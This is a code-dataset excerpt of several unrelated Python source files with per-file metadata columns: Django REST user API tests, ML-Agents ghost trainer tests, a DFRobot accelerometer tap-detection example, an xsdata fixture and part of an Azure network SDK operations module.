"""Test that email and password are required"""
res = self.client.post(TOKEN_URL, {'email': 'yep', 'password': ''})
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_user_unauthorized(self):
"""Test that authentication is required for users"""
res = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateUserApiTests(TestCase):
"""Test API requests that require authentication"""
def setUp(self):
self.user = create_user(
email='test@londonappdev.com',
password='testpass',
name='name'
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_retrieve_profile_success(self):
"""Test retriving profile of a logged in user"""
res = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, {
'name': self.user.name,
'email': self.user.email
})
def test_post_me_not_allowed(self):
"""test that post request is not allowed on ME url"""
res = self.client.post(ME_URL, {})
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_user_profile(self):
"""Test updating the user profile for authenticated users"""
payload = {'name': 'new name', 'password': 'newpassword'}
res = self.client.patch(ME_URL, payload)
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertTrue(self.user.check_password(payload['password']))
self.assertEqual(res.status_code, status.HTTP_200_OK)
| 35.5 | 77 | 0.660936 | from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
CREATE_USER_URL = reverse('user:create')
TOKEN_URL = reverse('user:token')
ME_URL = reverse('user:me')
def create_user(**params):
return get_user_model().objects.create_user(**params)
class PublicUsersAPITest(TestCase):
def setUp(self):
self.client = APIClient()
def test_create_valid_user_success(self):
payload = {
'email': 'test@example.com',
'password': 'test123',
'name': 'Test Name'
}
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
user = get_user_model().objects.get(**res.data)
self.assertTrue(user.check_password(payload['password']))
self.assertNotIn('password', res.data)
def test_user_exists(self):
payload = {'email': 'test2@example.com', 'password': 'testpass'}
create_user(**payload)
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_password_too_short(self):
payload = {'email': 'badpass@example.com', 'password': 'pass'}
res = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
user_exists = get_user_model().objects.filter(
email=payload['email']
).exists()
self.assertFalse(user_exists)
def test_create_token_for_user(self):
payload = {'email': 'something@domain.com', 'password': 'secret'}
create_user(**payload)
res = self.client.post(TOKEN_URL, payload)
self.assertIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_create_token_invalid_credentials(self):
create_user(email='test@example.com', password='testpass')
payload = {'email': 'test@example.com', 'password': 'NOPE'}
res = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_no_user(self):
payload = {'email': 'test@example.com', 'password': 'NOPE'}
res = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_missing_field(self):
res = self.client.post(TOKEN_URL, {'email': 'yep', 'password': ''})
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_user_unauthorized(self):
res = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateUserApiTests(TestCase):
def setUp(self):
self.user = create_user(
email='test@londonappdev.com',
password='testpass',
name='name'
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_retrieve_profile_success(self):
res = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, {
'name': self.user.name,
'email': self.user.email
})
def test_post_me_not_allowed(self):
res = self.client.post(ME_URL, {})
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_user_profile(self):
payload = {'name': 'new name', 'password': 'newpassword'}
res = self.client.patch(ME_URL, payload)
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertTrue(self.user.check_password(payload['password']))
self.assertEqual(res.status_code, status.HTTP_200_OK)
| true | true |
f7fa23b09eb9b83fe4fd070c213a3a143a346fa0 | 7,639 | py | Python | ml-agents/mlagents/trainers/tests/test_ghost.py | bobcy2015/ml-agents | 5d02292ad889f1884fa98bd92f127f17cbfe0112 | [
"Apache-2.0"
] | 1 | 2021-02-09T09:42:13.000Z | 2021-02-09T09:42:13.000Z | ml-agents/mlagents/trainers/tests/test_ghost.py | bobcy2015/ml-agents | 5d02292ad889f1884fa98bd92f127f17cbfe0112 | [
"Apache-2.0"
] | 5 | 2020-09-26T01:23:05.000Z | 2022-02-10T01:58:20.000Z | ml-agents/mlagents/trainers/tests/test_ghost.py | bobcy2015/ml-agents | 5d02292ad889f1884fa98bd92f127f17cbfe0112 | [
"Apache-2.0"
] | 1 | 2021-10-01T06:54:08.000Z | 2021-10-01T06:54:08.000Z | import pytest
import numpy as np
from mlagents.trainers.ghost.trainer import GhostTrainer
from mlagents.trainers.ghost.controller import GhostController
from mlagents.trainers.behavior_id_utils import BehaviorIdentifiers
from mlagents.trainers.ppo.trainer import PPOTrainer
from mlagents.trainers.brain import BrainParameters
from mlagents.trainers.agent_processor import AgentManagerQueue
from mlagents.trainers.tests import mock_brain as mb
from mlagents.trainers.tests.test_trajectory import make_fake_trajectory
from mlagents.trainers.settings import TrainerSettings, SelfPlaySettings
@pytest.fixture
def dummy_config():
return TrainerSettings(self_play=SelfPlaySettings())
VECTOR_ACTION_SPACE = [1]
VECTOR_OBS_SPACE = 8
DISCRETE_ACTION_SPACE = [3, 3, 3, 2]
BUFFER_INIT_SAMPLES = 513
NUM_AGENTS = 12
@pytest.mark.parametrize("use_discrete", [True, False])
def test_load_and_set(dummy_config, use_discrete):
mock_brain = mb.setup_mock_brain(
use_discrete,
False,
vector_action_space=VECTOR_ACTION_SPACE,
vector_obs_space=VECTOR_OBS_SPACE,
discrete_action_space=DISCRETE_ACTION_SPACE,
)
trainer_params = dummy_config
trainer = PPOTrainer(mock_brain.brain_name, 0, trainer_params, True, False, 0, "0")
trainer.seed = 1
policy = trainer.create_policy(mock_brain.brain_name, mock_brain)
policy.create_tf_graph()
trainer.seed = 20 # otherwise graphs are the same
to_load_policy = trainer.create_policy(mock_brain.brain_name, mock_brain)
to_load_policy.create_tf_graph()
to_load_policy.init_load_weights()
weights = policy.get_weights()
load_weights = to_load_policy.get_weights()
try:
for w, lw in zip(weights, load_weights):
np.testing.assert_array_equal(w, lw)
except AssertionError:
pass
to_load_policy.load_weights(weights)
load_weights = to_load_policy.get_weights()
for w, lw in zip(weights, load_weights):
np.testing.assert_array_equal(w, lw)
def test_process_trajectory(dummy_config):
brain_params_team0 = BrainParameters(
brain_name="test_brain?team=0",
vector_observation_space_size=1,
camera_resolutions=[],
vector_action_space_size=[2],
vector_action_descriptions=[],
vector_action_space_type=0,
)
brain_name = BehaviorIdentifiers.from_name_behavior_id(
brain_params_team0.brain_name
).brain_name
brain_params_team1 = BrainParameters(
brain_name="test_brain?team=1",
vector_observation_space_size=1,
camera_resolutions=[],
vector_action_space_size=[2],
vector_action_descriptions=[],
vector_action_space_type=0,
)
ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, "0")
controller = GhostController(100)
trainer = GhostTrainer(
ppo_trainer, brain_name, controller, 0, dummy_config, True, "0"
)
# first policy encountered becomes policy trained by wrapped PPO
parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(
brain_params_team0.brain_name
)
policy = trainer.create_policy(parsed_behavior_id0, brain_params_team0)
trainer.add_policy(parsed_behavior_id0, policy)
trajectory_queue0 = AgentManagerQueue(brain_params_team0.brain_name)
trainer.subscribe_trajectory_queue(trajectory_queue0)
# Ghost trainer should ignore this queue because off policy
parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(
brain_params_team1.brain_name
)
policy = trainer.create_policy(parsed_behavior_id1, brain_params_team1)
trainer.add_policy(parsed_behavior_id1, policy)
trajectory_queue1 = AgentManagerQueue(brain_params_team1.brain_name)
trainer.subscribe_trajectory_queue(trajectory_queue1)
time_horizon = 15
trajectory = make_fake_trajectory(
length=time_horizon,
max_step_complete=True,
vec_obs_size=1,
num_vis_obs=0,
action_space=[2],
)
trajectory_queue0.put(trajectory)
trainer.advance()
# Check that trainer put trajectory in update buffer
assert trainer.trainer.update_buffer.num_experiences == 15
trajectory_queue1.put(trajectory)
trainer.advance()
# Check that ghost trainer ignored off policy queue
assert trainer.trainer.update_buffer.num_experiences == 15
# Check that it emptied the queue
assert trajectory_queue1.empty()
def test_publish_queue(dummy_config):
brain_params_team0 = BrainParameters(
brain_name="test_brain?team=0",
vector_observation_space_size=8,
camera_resolutions=[],
vector_action_space_size=[1],
vector_action_descriptions=[],
vector_action_space_type=0,
)
parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(
brain_params_team0.brain_name
)
brain_name = parsed_behavior_id0.brain_name
brain_params_team1 = BrainParameters(
brain_name="test_brain?team=1",
vector_observation_space_size=8,
camera_resolutions=[],
vector_action_space_size=[1],
vector_action_descriptions=[],
vector_action_space_type=0,
)
ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, "0")
controller = GhostController(100)
trainer = GhostTrainer(
ppo_trainer, brain_name, controller, 0, dummy_config, True, "0"
)
# First policy encountered becomes policy trained by wrapped PPO
# This queue should remain empty after swap snapshot
policy = trainer.create_policy(parsed_behavior_id0, brain_params_team0)
trainer.add_policy(parsed_behavior_id0, policy)
policy_queue0 = AgentManagerQueue(brain_params_team0.brain_name)
trainer.publish_policy_queue(policy_queue0)
# Ghost trainer should use this queue for ghost policy swap
parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(
brain_params_team1.brain_name
)
policy = trainer.create_policy(parsed_behavior_id1, brain_params_team1)
trainer.add_policy(parsed_behavior_id1, policy)
policy_queue1 = AgentManagerQueue(brain_params_team1.brain_name)
trainer.publish_policy_queue(policy_queue1)
# check ghost trainer swap pushes to ghost queue and not trainer
assert policy_queue0.empty() and policy_queue1.empty()
trainer._swap_snapshots()
assert policy_queue0.empty() and not policy_queue1.empty()
# clear
policy_queue1.get_nowait()
mock_brain = mb.setup_mock_brain(
False,
False,
vector_action_space=VECTOR_ACTION_SPACE,
vector_obs_space=VECTOR_OBS_SPACE,
discrete_action_space=DISCRETE_ACTION_SPACE,
)
buffer = mb.simulate_rollout(BUFFER_INIT_SAMPLES, mock_brain)
# Mock out reward signal eval
buffer["extrinsic_rewards"] = buffer["environment_rewards"]
buffer["extrinsic_returns"] = buffer["environment_rewards"]
buffer["extrinsic_value_estimates"] = buffer["environment_rewards"]
buffer["curiosity_rewards"] = buffer["environment_rewards"]
buffer["curiosity_returns"] = buffer["environment_rewards"]
buffer["curiosity_value_estimates"] = buffer["environment_rewards"]
buffer["advantages"] = buffer["environment_rewards"]
trainer.trainer.update_buffer = buffer
# when ghost trainer advance and wrapped trainer buffers full
# the wrapped trainer pushes updated policy to correct queue
assert policy_queue0.empty() and policy_queue1.empty()
trainer.advance()
assert not policy_queue0.empty() and policy_queue1.empty()
if __name__ == "__main__":
pytest.main()
| 35.86385 | 87 | 0.74604 | import pytest
import numpy as np
from mlagents.trainers.ghost.trainer import GhostTrainer
from mlagents.trainers.ghost.controller import GhostController
from mlagents.trainers.behavior_id_utils import BehaviorIdentifiers
from mlagents.trainers.ppo.trainer import PPOTrainer
from mlagents.trainers.brain import BrainParameters
from mlagents.trainers.agent_processor import AgentManagerQueue
from mlagents.trainers.tests import mock_brain as mb
from mlagents.trainers.tests.test_trajectory import make_fake_trajectory
from mlagents.trainers.settings import TrainerSettings, SelfPlaySettings
@pytest.fixture
def dummy_config():
return TrainerSettings(self_play=SelfPlaySettings())
VECTOR_ACTION_SPACE = [1]
VECTOR_OBS_SPACE = 8
DISCRETE_ACTION_SPACE = [3, 3, 3, 2]
BUFFER_INIT_SAMPLES = 513
NUM_AGENTS = 12
@pytest.mark.parametrize("use_discrete", [True, False])
def test_load_and_set(dummy_config, use_discrete):
mock_brain = mb.setup_mock_brain(
use_discrete,
False,
vector_action_space=VECTOR_ACTION_SPACE,
vector_obs_space=VECTOR_OBS_SPACE,
discrete_action_space=DISCRETE_ACTION_SPACE,
)
trainer_params = dummy_config
trainer = PPOTrainer(mock_brain.brain_name, 0, trainer_params, True, False, 0, "0")
trainer.seed = 1
policy = trainer.create_policy(mock_brain.brain_name, mock_brain)
policy.create_tf_graph()
trainer.seed = 20
to_load_policy = trainer.create_policy(mock_brain.brain_name, mock_brain)
to_load_policy.create_tf_graph()
to_load_policy.init_load_weights()
weights = policy.get_weights()
load_weights = to_load_policy.get_weights()
try:
for w, lw in zip(weights, load_weights):
np.testing.assert_array_equal(w, lw)
except AssertionError:
pass
to_load_policy.load_weights(weights)
load_weights = to_load_policy.get_weights()
for w, lw in zip(weights, load_weights):
np.testing.assert_array_equal(w, lw)
def test_process_trajectory(dummy_config):
brain_params_team0 = BrainParameters(
brain_name="test_brain?team=0",
vector_observation_space_size=1,
camera_resolutions=[],
vector_action_space_size=[2],
vector_action_descriptions=[],
vector_action_space_type=0,
)
brain_name = BehaviorIdentifiers.from_name_behavior_id(
brain_params_team0.brain_name
).brain_name
brain_params_team1 = BrainParameters(
brain_name="test_brain?team=1",
vector_observation_space_size=1,
camera_resolutions=[],
vector_action_space_size=[2],
vector_action_descriptions=[],
vector_action_space_type=0,
)
ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, "0")
controller = GhostController(100)
trainer = GhostTrainer(
ppo_trainer, brain_name, controller, 0, dummy_config, True, "0"
)
parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(
brain_params_team0.brain_name
)
policy = trainer.create_policy(parsed_behavior_id0, brain_params_team0)
trainer.add_policy(parsed_behavior_id0, policy)
trajectory_queue0 = AgentManagerQueue(brain_params_team0.brain_name)
trainer.subscribe_trajectory_queue(trajectory_queue0)
parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(
brain_params_team1.brain_name
)
policy = trainer.create_policy(parsed_behavior_id1, brain_params_team1)
trainer.add_policy(parsed_behavior_id1, policy)
trajectory_queue1 = AgentManagerQueue(brain_params_team1.brain_name)
trainer.subscribe_trajectory_queue(trajectory_queue1)
time_horizon = 15
trajectory = make_fake_trajectory(
length=time_horizon,
max_step_complete=True,
vec_obs_size=1,
num_vis_obs=0,
action_space=[2],
)
trajectory_queue0.put(trajectory)
trainer.advance()
assert trainer.trainer.update_buffer.num_experiences == 15
trajectory_queue1.put(trajectory)
trainer.advance()
assert trainer.trainer.update_buffer.num_experiences == 15
assert trajectory_queue1.empty()
def test_publish_queue(dummy_config):
brain_params_team0 = BrainParameters(
brain_name="test_brain?team=0",
vector_observation_space_size=8,
camera_resolutions=[],
vector_action_space_size=[1],
vector_action_descriptions=[],
vector_action_space_type=0,
)
parsed_behavior_id0 = BehaviorIdentifiers.from_name_behavior_id(
brain_params_team0.brain_name
)
brain_name = parsed_behavior_id0.brain_name
brain_params_team1 = BrainParameters(
brain_name="test_brain?team=1",
vector_observation_space_size=8,
camera_resolutions=[],
vector_action_space_size=[1],
vector_action_descriptions=[],
vector_action_space_type=0,
)
ppo_trainer = PPOTrainer(brain_name, 0, dummy_config, True, False, 0, "0")
controller = GhostController(100)
trainer = GhostTrainer(
ppo_trainer, brain_name, controller, 0, dummy_config, True, "0"
)
policy = trainer.create_policy(parsed_behavior_id0, brain_params_team0)
trainer.add_policy(parsed_behavior_id0, policy)
policy_queue0 = AgentManagerQueue(brain_params_team0.brain_name)
trainer.publish_policy_queue(policy_queue0)
parsed_behavior_id1 = BehaviorIdentifiers.from_name_behavior_id(
brain_params_team1.brain_name
)
policy = trainer.create_policy(parsed_behavior_id1, brain_params_team1)
trainer.add_policy(parsed_behavior_id1, policy)
policy_queue1 = AgentManagerQueue(brain_params_team1.brain_name)
trainer.publish_policy_queue(policy_queue1)
assert policy_queue0.empty() and policy_queue1.empty()
trainer._swap_snapshots()
assert policy_queue0.empty() and not policy_queue1.empty()
policy_queue1.get_nowait()
mock_brain = mb.setup_mock_brain(
False,
False,
vector_action_space=VECTOR_ACTION_SPACE,
vector_obs_space=VECTOR_OBS_SPACE,
discrete_action_space=DISCRETE_ACTION_SPACE,
)
buffer = mb.simulate_rollout(BUFFER_INIT_SAMPLES, mock_brain)
buffer["extrinsic_rewards"] = buffer["environment_rewards"]
buffer["extrinsic_returns"] = buffer["environment_rewards"]
buffer["extrinsic_value_estimates"] = buffer["environment_rewards"]
buffer["curiosity_rewards"] = buffer["environment_rewards"]
buffer["curiosity_returns"] = buffer["environment_rewards"]
buffer["curiosity_value_estimates"] = buffer["environment_rewards"]
buffer["advantages"] = buffer["environment_rewards"]
trainer.trainer.update_buffer = buffer
assert policy_queue0.empty() and policy_queue1.empty()
trainer.advance()
assert not policy_queue0.empty() and policy_queue1.empty()
if __name__ == "__main__":
pytest.main()
| true | true |
f7fa24d651fbf35d14fa24663e22558ba34c8d90 | 4,531 | py | Python | python/raspberrypi/examples/tap/tap.py | cdjq/DFRobot_IIS2DLPC | 87528abcc15a15dc499a3b446910ccdde1a8adfe | [
"MIT"
] | null | null | null | python/raspberrypi/examples/tap/tap.py | cdjq/DFRobot_IIS2DLPC | 87528abcc15a15dc499a3b446910ccdde1a8adfe | [
"MIT"
] | null | null | null | python/raspberrypi/examples/tap/tap.py | cdjq/DFRobot_IIS2DLPC | 87528abcc15a15dc499a3b446910ccdde1a8adfe | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
"""
@file tap.py
@brief Single click and double click detection
@copyright Copyright (c) 2010 DFRobot Co.Ltd (http://www.dfrobot.com)
@licence The MIT License (MIT)
@author [fengli](li.feng@dfrobot.com)
@version V1.0
@date 2021-01-16
@get from https://www.dfrobot.com
@https://github.com/DFRobot/DFRobot_IIS2DLPC
"""
import sys
sys.path.append("../..") # set system path to top
from DFRobot_IIS2DLPC import *
import time
#如果你想要用SPI驱动此模块,打开下面两行的注释并通过SPI连接好模块和树莓派
RASPBERRY_PIN_CS = 27 #Chip selection pin when SPI is selected
acce = DFRobot_IIS2DLPC_SPI(RASPBERRY_PIN_CS)
#如果你想要应IIC驱动此模块,打开下面三行的注释,并通过I2C连接好模块和树莓树莓派
I2C_MODE = 0x01 #default use I2C1
ADDRESS_0 = 0x19 #I2C address
#acce = DFRobot_IIS2DLPC_I2C(I2C_MODE ,ADDRESS_0)
acce.begin()
print("chip id :")
print(acce.get_ID())
acce.soft_reset()
'''
@brief Set the measurement range
@param range:Range(g)
RANGE_2G #/**<±2g>*/
RANGE_4G #/**<±4g>*/
RANGE_8G #/**<±8g>*/
RANGE_16G #/**< ±16g>*/
'''
acce.set_range(acce.RANGE_2G)
acce.set_power_mode(acce.CONT_LOWPWRLOWNOISE_12BIT)
acce.set_data_rate(acce.ODR_800HZ)
#Enable click detection in the X direction
acce.enable_tap_detection_on_z(True)
#Enable click detection in Y direction
acce.enable_tap_detection_on_y(True)
#Enable click detection in the Z direction
acce.enable_tap_detection_on_x(True)
#The threshold setting in the X direction is similar to the sensitivity of detection, the larger the value, the less sensitive (0~31)
acce.set_tap_threshold_on_x(0.5)
#The threshold setting in the Y direction is similar to the sensitivity of detection, the larger the value, the less sensitive (0~31)
acce.set_tap_threshold_on_y(0.5)
#The threshold setting in the Z direction is similar to the sensitivity of detection, the larger the value, the less sensitive (0~31)
acce.set_tap_threshold_on_z(0.5)
'''
双击的两次点击之间的间隔时间:
@param th 1 LSB = 32 * 1/ODR(0~15)
@n ODR:Data acquisition frequency
@n example
| High-pass filter cut-off frequency configuration |
|--------------------------------------------------------------------------------------------------------|
| | ft [Hz] | ft [Hz] | ft [Hz] | ft [Hz] |
| dur |Data rate = 25 Hz| Data rate = 100 Hz | Data rate = 400 Hz | Data rate = 800 Hz |
|--------------------------------------------------------------------------------------------------------|
| n |n*(1s/25)= n*40ms| n*(1s/100)= n*10ms | n*(1s/400)= 2.5*nms | n*(1s/800)= n*1.25ms |
|--------------------------------------------------------------------------------------------------------|
'''
acce.set_tap_dur(3)
'''
Set the click detection mode:
ONLY_SINGLE //检测单击
BOTH_SINGLE_DOUBLE //检测单击和双击
'''
acce.set_tap_mode(acce.BOTH_SINGLE_DOUBLE)
'''
Set the interrupt source of the int1 pin:
DOUBLE_TAP = 0x08 #/**< Double-tap recognition is routed to INT1 pad>*/
FF_EVENT = 0x10 #/**< Free-fall recognition is routed to INT1 pad>*/
WAKEUP_EVENT = 0x20 #/**<Wakeup recognition is routed to INT1 pad>*/
SINGLE_TAP = 0x40 #/**<Single-tap recognition is routed to INT1 pad.>*/
TNT_16D = 0x80 #/**<6D recognition is routed to INT1 pad>*/
'''
acce.set_int1_route(acce.DOUBLE_TAP)
time.sleep(0.1)
while True:
#Get the acceleration in the three directions of xyz
#time.sleep(0.3)
tap = False
event = acce.tap_detect()
direction = acce.get_tap_direction()
if event == acce.SINGLE_CLICK:
print ("Tap Detected :")
tap = True
elif event == acce.DOUBLE_CLICK:
print ("Double Tap Detected :")
tap = True
if tap == True:
if direction == acce.DIR_X_UP:
print("Click it in the positive direction of x")
elif direction == acce.DIR_X_DOWN:
print("Click it in the negative direction of x")
elif direction == acce.DIR_Y_UP:
print("Click it in the positive direction of y")
elif direction == acce.DIR_Y_DOWN:
print("Click it in the negative direction of y")
elif direction == acce.DIR_Z_UP:
print("Click it in the positive direction of z")
elif direction == acce.DIR_Z_DOWN:
print("Click it in the negative direction of z")
tap = False
| 37.446281 | 133 | 0.594571 |
import sys
sys.path.append("../..")
from DFRobot_IIS2DLPC import *
import time
RASPBERRY_PIN_CS = 27
acce = DFRobot_IIS2DLPC_SPI(RASPBERRY_PIN_CS)
I2C_MODE = 0x01
ADDRESS_0 = 0x19
acce.begin()
print("chip id :")
print(acce.get_ID())
acce.soft_reset()
acce.set_range(acce.RANGE_2G)
acce.set_power_mode(acce.CONT_LOWPWRLOWNOISE_12BIT)
acce.set_data_rate(acce.ODR_800HZ)
acce.enable_tap_detection_on_z(True)
acce.enable_tap_detection_on_y(True)
acce.enable_tap_detection_on_x(True)
acce.set_tap_threshold_on_x(0.5)
acce.set_tap_threshold_on_y(0.5)
acce.set_tap_threshold_on_z(0.5)
acce.set_tap_dur(3)
acce.set_tap_mode(acce.BOTH_SINGLE_DOUBLE)
acce.set_int1_route(acce.DOUBLE_TAP)
time.sleep(0.1)
while True:
tap = False
event = acce.tap_detect()
direction = acce.get_tap_direction()
if event == acce.SINGLE_CLICK:
print ("Tap Detected :")
tap = True
elif event == acce.DOUBLE_CLICK:
print ("Double Tap Detected :")
tap = True
if tap == True:
if direction == acce.DIR_X_UP:
print("Click it in the positive direction of x")
elif direction == acce.DIR_X_DOWN:
print("Click it in the negative direction of x")
elif direction == acce.DIR_Y_UP:
print("Click it in the positive direction of y")
elif direction == acce.DIR_Y_DOWN:
print("Click it in the negative direction of y")
elif direction == acce.DIR_Z_UP:
print("Click it in the positive direction of z")
elif direction == acce.DIR_Z_DOWN:
print("Click it in the negative direction of z")
tap = False
| true | true |
f7fa254eb5afb9b7cbe5f1041ae6c0937b58180f | 501 | py | Python | tests/fixtures/defxmlschema/chapter13/example1338.py | nimish/xsdata | 7afe2781b66982428cc1731f53c065086acd35c1 | [
"MIT"
] | null | null | null | tests/fixtures/defxmlschema/chapter13/example1338.py | nimish/xsdata | 7afe2781b66982428cc1731f53c065086acd35c1 | [
"MIT"
] | null | null | null | tests/fixtures/defxmlschema/chapter13/example1338.py | nimish/xsdata | 7afe2781b66982428cc1731f53c065086acd35c1 | [
"MIT"
] | null | null | null | from dataclasses import dataclass, field
from typing import Optional
@dataclass
class ProductType:
"""
:ivar number:
:ivar name:
"""
number: Optional[int] = field(
default=None,
metadata=dict(
type="Element",
namespace="",
required=True
)
)
name: Optional[str] = field(
default=None,
metadata=dict(
type="Element",
namespace="",
required=True
)
)
| 18.555556 | 40 | 0.506986 | from dataclasses import dataclass, field
from typing import Optional
@dataclass
class ProductType:
number: Optional[int] = field(
default=None,
metadata=dict(
type="Element",
namespace="",
required=True
)
)
name: Optional[str] = field(
default=None,
metadata=dict(
type="Element",
namespace="",
required=True
)
)
| true | true |
f7fa25e2e966613e108674abeb184f3e8636f74f | 46,597 | py | Python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2016_09_01/operations/_network_interfaces_operations.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | 8 | 2021-01-13T23:44:08.000Z | 2021-03-17T10:13:36.000Z | sdk/network/azure-mgmt-network/azure/mgmt/network/v2016_09_01/operations/_network_interfaces_operations.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | null | null | null | sdk/network/azure-mgmt-network/azure/mgmt/network/v2016_09_01/operations/_network_interfaces_operations.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfacesOperations(object):
"""NetworkInterfacesOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2016_09_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_virtual_machine_scale_set_vm_network_interfaces(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
virtualmachine_index, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceListResult"]
"""Gets information about all network interfaces in a virtual machine in a virtual machine scale
set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2016_09_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_vm_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_vm_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces'} # type: ignore
def list_virtual_machine_scale_set_network_interfaces(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
**kwargs # type: Any
):
